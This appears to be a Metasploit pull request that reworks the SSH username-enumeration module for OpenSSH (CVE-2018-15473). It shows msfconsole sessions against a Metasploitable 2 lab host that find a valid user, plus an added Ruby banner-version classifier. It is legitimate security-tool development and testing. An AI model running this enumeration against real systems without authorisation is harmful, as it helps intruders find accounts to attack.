ssh_enumusers: Update workspace #21438

Open: g0tmi1k wants to merge 7 commits into rapid7:master from g0tmi1k:ssh_enumusers


@g0tmi1k g0tmi1k commented May 10, 2026

This PR does a few things:

  • Rename the module as it's only for OpenSSH (both actions)
  • Use SSH mixin
  • Add CALIBRATE_COUNT option, so able to auto-calibrate timing
  • Improve output
    • e.g. Checks the OpenSSH version against vulnerable versions and gives feedback if it should/should not be vulnerable to attack/action

Target is Metasploitable 2.

        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  0      0         0      0      0      0
After : *        default  1      2         1      1      0      1

Setup

Simple wordlists for users:

$ cat << EOF > /tmp/users.txt
msfadmin
kali
incorrect
EOF
$ 

Before

  • Scanning ...anything always gave 0
  • All testing was done using master branch
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use auxiliary/scanner/ssh/ssh_enumusers;
setg USER_FILE /tmp/users.txt;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] Setting default action Malformed Packet - view all 2 actions with the show actions command
USER_FILE => /tmp/users.txt

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CHECK_FALSE   true             no        Check for false positives (random username)
   DB_ALL_USERS  false            no        Add all users in the current database to the list
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         22               yes       The target port
   THREADS       1                yes       The number of concurrent threads (max one per host)
   THRESHOLD     10               yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                       no        Single username to test (username spray)
   USER_FILE     /tmp/users.txt   no        File containing usernames, one per line


Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet



View the full module info with the info, or info -d command.

msf auxiliary(scanner/ssh/ssh_enumusers) >
msf auxiliary(scanner/ssh/ssh_enumusers) > run RHOST=10.0.0.10 RPORT=9999
[*] 10.0.0.10:9999 - SSH - Using malformed packet technique
[*] 10.0.0.10:9999 - SSH - Checking for false positives
[*] 10.0.0.10:9999 - SSH - Retrying 'SG9ehCntRIxAbllSecQ' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'SG9ehCntRIxAbllSecQ' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'SG9ehCntRIxAbllSecQ' due to connection error
[*] 10.0.0.10:9999 - SSH - Starting scan
[*] 10.0.0.10:9999 - SSH - Retrying 'msfadmin' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'msfadmin' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'msfadmin' due to connection error
[-] 10.0.0.10:9999 - SSH - User 'msfadmin' could not connect
[*] 10.0.0.10:9999 - SSH - Retrying 'kali' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'kali' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'kali' due to connection error
[-] 10.0.0.10:9999 - SSH - User 'kali' could not connect
[*] 10.0.0.10:9999 - SSH - Retrying 'incorrect' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'incorrect' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'incorrect' due to connection error
[-] 10.0.0.10:9999 - SSH - User 'incorrect' could not connect
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf auxiliary(scanner/ssh/ssh_enumusers) >
msf auxiliary(scanner/ssh/ssh_enumusers) > run RHOST=10.0.0.10 RPORT=21
[*] 10.0.0.10:21 - SSH - Using malformed packet technique
[*] 10.0.0.10:21 - SSH - Checking for false positives
[*] 10.0.0.10:21 - SSH - Starting scan
[-] 10.0.0.10:21 - SSH - User 'msfadmin' not found
[-] 10.0.0.10:21 - SSH - User 'kali' not found
[-] 10.0.0.10:21 - SSH - User 'incorrect' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf auxiliary(scanner/ssh/ssh_enumusers) >
msf auxiliary(scanner/ssh/ssh_enumusers) > run RHOST=10.0.0.10
[*] 10.0.0.10:22 - SSH - Using malformed packet technique
[*] 10.0.0.10:22 - SSH - Checking for false positives
[*] 10.0.0.10:22 - SSH - Starting scan
[+] 10.0.0.10:22 - SSH - User 'msfadmin' found
[-] 10.0.0.10:22 - SSH - User 'kali' not found
[-] 10.0.0.10:22 - SSH - User 'incorrect' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         0      1      0      0

msf auxiliary(scanner/ssh/ssh_enumusers) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf auxiliary(scanner/ssh/ssh_enumusers) > services
Services
========

host       port  proto  name  state  info  resource  parents
----       ----  -----  ----  -----  ----  --------  -------
10.0.0.10  22    tcp    ssh   open         {}

msf auxiliary(scanner/ssh/ssh_enumusers) > creds
Credentials
===========

id   host       origin     service       public    private  realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------  -----  ------------  ----------  ----------------
570  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin

msf auxiliary(scanner/ssh/ssh_enumusers) >
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf auxiliary(scanner/ssh/ssh_enumusers) > run RHOST=10.0.0.1
[*] 10.0.0.1:22 - SSH - Using malformed packet technique
[*] 10.0.0.1:22 - SSH - Checking for false positives
[-] 10.0.0.1:22 - SSH - throws false positive results. Aborting.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf auxiliary(scanner/ssh/ssh_enumusers) >

After

$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use auxiliary/scanner/ssh/openssh_enumusers;
setg USER_FILE /tmp/users.txt;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] Setting default action Malformed Packet - view all 2 actions with the show actions command
USER_FILE => /tmp/users.txt

Module options (auxiliary/scanner/ssh/openssh_enumusers):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CHECK_FALSE   true             no        Check for false positives (random username)
   DB_ALL_USERS  false            no        Add all users in the current database to the list
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         22               yes       The target port
   THREADS       1                yes       The number of concurrent threads (max one per host)
   THRESHOLD     10               yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                       no        Single username to test (username spray)
   USER_FILE     /tmp/users.txt   no        File containing usernames, one per line


Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet (OpenSSH <= 7.6, CVE-2018-15473)



View the full module info with the info, or info -d command.

msf auxiliary(scanner/ssh/openssh_enumusers) >
msf auxiliary(scanner/ssh/openssh_enumusers) > run RHOST=10.0.0.10 RPORT=9999
[-] 10.0.0.10:9999 - No response (port closed or wrong service)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         0      0      0      0

msf auxiliary(scanner/ssh/openssh_enumusers) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf auxiliary(scanner/ssh/openssh_enumusers) >
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf auxiliary(scanner/ssh/openssh_enumusers) > run RHOST=10.0.0.10 RPORT=21
[*] 10.0.0.10:21 - SSH banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Checking for false positives
[*] Loaded 3 users from /tmp/users.txt
[*] 10.0.0.10:21 - Starting SSH username enumeration
[*] 10.0.0.10:21 - User 'msfadmin' not found
[*] 10.0.0.10:21 - User 'kali' not found
[*] 10.0.0.10:21 - User 'incorrect' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         0      0      0      0

msf auxiliary(scanner/ssh/openssh_enumusers) > services
Services
========

host       port  proto  name  state  info                resource  parents
----       ----  -----  ----  -----  ----                --------  -------
10.0.0.10  21    tcp    ssh   open   220 (vsFTPd 2.3.4)  {}

msf auxiliary(scanner/ssh/openssh_enumusers) >
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf auxiliary(scanner/ssh/openssh_enumusers) > run RHOST=10.0.0.10
[*] 10.0.0.10:22 - SSH banner: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] 10.0.0.10:22 - OpenSSH 4.7 may be vulnerable to Malformed Packet/CVE-2018-15473
[*] 10.0.0.10:22 - Checking for false positives
[*] Loaded 3 users from /tmp/users.txt
[*] 10.0.0.10:22 - Starting SSH username enumeration
[+] 10.0.0.10:22 - User 'msfadmin' found
[*] 10.0.0.10:22 - User 'kali' not found
[*] 10.0.0.10:22 - User 'incorrect' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      1      0      1

msf auxiliary(scanner/ssh/openssh_enumusers) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Linux    Ubuntu     8.04   server

msf auxiliary(scanner/ssh/openssh_enumusers) > services
Services
========

host       port  proto  name  state  info                                   resource  parents
----       ----  -----  ----  -----  ----                                   --------  -------
10.0.0.10  22    tcp    ssh   open   SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1  {}        tcp (22/tcp)
10.0.0.10  22    tcp    tcp   open                                          {}

msf auxiliary(scanner/ssh/openssh_enumusers) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                                          References
---------                ----       -------       --------  ----                                          ----------
2026-05-26 20:23:00 UTC  10.0.0.10  ssh (22/tcp)  {}        OpenSSH 7.6 And Earlier Username Enumeration  CVE-2003-0190,CVE-2006-5229,CVE-2016-6210,CVE-2018-15473,OSVDB-32721,BID-20418,URL-https://seclists.
                                                                                                          org/oss-sec/2018/q3/124,URL-https://sekurak.pl/openssh-users-enumeration-cve-2018-15473/

msf auxiliary(scanner/ssh/openssh_enumusers) > creds
Credentials
===========

id   host       origin     service       public    private  realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------  -----  ------------  ----------  ----------------
572  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin

msf auxiliary(scanner/ssh/openssh_enumusers) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type     Data
 ----                     ----       -------  ----  --------  ----     ----
 2026-05-26 20:23:00 UTC  10.0.0.10  ssh      22    tcp       ssh.cpe  {:cpe=>"cpe:/o:canonical:ubuntu_linux:8.04"}

msf auxiliary(scanner/ssh/openssh_enumusers) >
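
The banner check described in this PR, sketched as an added example for asset-inventory use (not code from the pull request or from Metasploit). `classify_ssh_banner` and `LAST_AFFECTED` are hypothetical names, and the 7.6 bound is taken from the action description shown in the session above.

```ruby
# Added illustration; not code from the pull request or from Metasploit.
# classify_ssh_banner and LAST_AFFECTED are hypothetical names.
require 'rubygems' # Gem::Version compares 10.0 > 7.6 numerically

# Upper bound from the action description above: "OpenSSH <= 7.6".
LAST_AFFECTED = Gem::Version.new('7.6')

# Classify a service banner for asset-inventory purposes.
# Returns { ssh:, openssh:, verdict: }.
def classify_ssh_banner(banner)
  line = banner.to_s.lines.first.to_s.strip
  # RFC 4253 identification string: SSH-protoversion-softwareversion [comments]
  id = line.match(/\ASSH-\d+\.\d+-(\S+)/)
  return { ssh: false, openssh: nil, verdict: :not_ssh } unless id

  sw = id[1].match(/\AOpenSSH_(?:for_Windows_)?(\d+(?:\.\d+)+)/)
  return { ssh: true, openssh: nil, verdict: :not_openssh } unless sw

  version = Gem::Version.new(sw[1])
  # A banner is only a hint: distributions backport fixes without changing
  # the version string, so the result is "may be", never "is" affected.
  verdict = version <= LAST_AFFECTED ? :may_be_affected : :not_expected_affected
  { ssh: true, openssh: version, verdict: verdict }
end

if __FILE__ == $PROGRAM_NAME
  [
    'SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1', # from the session above
    '220 (vsFTPd 2.3.4)',                    # from the session above (port 21)
    'SSH-2.0-OpenSSH_10.0',                  # constructed sample
    'SSH-2.0-dropbear_2022.83'               # constructed sample
  ].each do |b|
    r = classify_ssh_banner(b)
    puts format('%-40s %-22s %s', b, r[:verdict], r[:openssh])
  end
end
```

With this classification the port 21 banner `220 (vsFTPd 2.3.4)` comes back as `:not_ssh`, which is the case where the session above still records the service under the name `ssh`.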

@g0tmi1k g0tmi1k force-pushed the ssh_enumusers branch 5 times, most recently from 10138b7 to 63b445b Compare May 14, 2026 13:07
@g0tmi1k g0tmi1k force-pushed the ssh_enumusers branch 6 times, most recently from 560e72c to fc6014b Compare May 19, 2026 15:11
@g0tmi1k g0tmi1k marked this pull request as draft May 21, 2026 13:49
@g0tmi1k g0tmi1k force-pushed the ssh_enumusers branch 4 times, most recently from 13c7619 to 377b7a7 Compare May 22, 2026 20:54
@g0tmi1k g0tmi1k changed the title ssh_enumusers: Various improvements ssh_enumusers: Update workspace May 26, 2026
@g0tmi1k g0tmi1k marked this pull request as ready for review May 26, 2026 20:28

g0tmi1k commented May 26, 2026

Think I've finished tweaking with this PR!
